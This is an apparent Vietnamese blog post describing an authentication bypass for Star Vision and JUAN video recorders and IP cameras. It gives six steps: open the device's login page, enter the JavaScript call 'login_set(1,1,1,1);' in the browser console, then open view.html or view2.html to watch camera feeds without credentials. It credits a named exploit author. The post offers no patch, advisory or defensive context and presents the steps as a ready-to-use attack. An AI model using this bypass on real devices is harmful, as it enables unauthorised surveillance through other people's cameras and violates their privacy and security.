Khai thác lỗi bảo mật thiết bị của Star Vision và JUAN trên đầu ghi hình và ip  camera

Star Vision & JUAN – Authentication Bypass

Cách khai thác lỗi :
1 - Đầu tiên mở trình duyệt Chrome hoặc Cốc Cốc
2 - Đi tới địa chỉ ip hoặc tên miền thiết bị
3 - Khi hiện cửa sổ đăng nhập thiết bị, Bấm F12 để mở cửa sổ giao diện điều khiển trình duyệt
4 - Bấm vào tab Console và nhập dòng sau:
login_set(1,1,1,1);
5 - Sau đó tới trang view2.html hoặc view.html
6 - Giờ ta có thể xem camera mà không cần biết tài khoản của thiết bị
Thanks Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com

5 thoughts on “Khai thác lỗi bảo mật Star Vision & JUAN

Comments are closed.